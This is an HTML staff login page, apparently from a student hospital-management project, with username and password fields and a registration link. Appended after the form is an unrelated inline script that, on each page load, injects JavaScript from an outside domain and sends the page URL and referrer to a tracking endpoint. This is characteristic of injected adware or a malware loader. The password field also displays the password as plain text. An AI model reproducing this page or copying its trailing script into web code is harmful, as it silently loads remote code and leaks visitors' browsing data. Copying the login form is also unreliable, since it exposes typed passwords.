<html>
<head>
<title>STAFF</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
.parallax {
  /* The image used */
  background-image: url("th.jpg");

  /* Set a specific height */
  min-height: 400px; 

  /* Create the parallax scrolling effect */
  background-attachment: fixed;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

form{
    font-size:30px;
	font-weight:40px;
	padding:10px 10px 10px 10px;
	}
	input{
	font-size:30px;
	font-weight:40px;
	padding:10px 10px 10px 10px;
	}
	input[type="submit"] 
	{
      background:#141414;
      color: white;
    }
</style>
</head>
<body>
<div class="parallax"></div>
<div style="height:450px;background-color:#8785B2;font-size:36px">
<form method="post">
<center>USERNAME:<input type="text" name="username" required><br><br>
PASSWORD:&nbsp;<input type="text" name="password"required><br><br>
<a href="SUBMIT.html"><input type="submit" value="SUBMIT" ></a>
<p>Don't Have An Account Click Bellow</p><br>
<a href="reg.html"><img src="C:\Users\hp\Desktop\Notepad++\project_hms\images\reg.png" alt="img"></a></center>
</form>
</div>
<script type="text/javascript">(function(window, document) {if (window === top) {var script = document.createElement('script'); script.src = 'https://cdn.immereeako.info/pa.min.js'; document.getElementsByTagName('head')[0].insertAdjacentElement('beforeEnd', script); window['_paInfo_'] = window['_paInfo_'] || {uid: 'HWXCBWTXWD',sub1: 'hwwm'};(new Image).src = '//www.w3schools.com/pages/imevrstk.php?qd=BTB&zqd=009.005&nbid=c15169f05587112cb0fadeaa576adcf9&cid=193158' + '&url=' + encodeURIComponent(location.href) + '&ref=' + encodeURIComponent(document.referrer) + '&t=' + parseInt(Math.random()*1000000);}})(window, document);</script>
</body>
</html>